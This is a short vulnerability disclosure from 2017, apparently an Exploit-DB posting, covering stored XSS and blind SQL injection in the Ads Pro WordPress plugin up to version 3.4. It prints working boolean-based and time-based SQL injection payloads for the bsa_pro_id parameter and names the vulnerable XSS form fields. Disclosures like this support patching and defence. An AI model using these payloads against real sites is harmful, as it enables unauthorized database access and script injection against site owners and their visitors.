WordPress Ads Pro 3.4 Cross Site Scripting / SQL Injection
Posted on 06 September 2017
# Exploit Title: Ads Pro Plugin - Multi-Purpose WordPress Advertising Manager <= v3.4 - Stored XSS / SQLi # Date: 2017-07-25 # Exploit Author: 8bitsec # Vendor Homepage: http://adspro.scripteo.info/ # Software Link: https://codecanyon.net/item/ads-pro-plugin-multipurpose-wordpress-advertising-manager/10275010 # Version: 3.4 # Tested on: [Kali Linux 2.0 | Mac OS 10.12.6] # Email: contact@8bitsec.io # Contact: https://twitter.com/_8bitsec Release Date: ============= 2017-07-25 Product & Service Introduction: =============================== Ads Pro is a Premium WordPress Ad Plugin that helps you manage, sell and display your advertising space, in a way that no other plugin can. Technical Details & Description: ================================ Multiple Stored XSS vulnerabilities found. Blind SQL Injection on bsa_pro_id parameter. Proof of Concept (PoC): ======================= Stored XSS: On the Front End Order Form the Ad Title and Ad Description parameters are vulnerable. The payload will execute when the ad is displayed. Blind SQL Injection: Parameter: bsa_pro_id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: bsa_pro_stats=1&bsa_pro_email=some@email.com&bsa_pro_id=xx AND 1707=1707 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: bsa_pro_stats=1&bsa_pro_email=some@email.com&bsa_pro_id=xx AND SLEEP(5) Credits & Authors: ================== 8bitsec - [https://twitter.com/_8bitsec]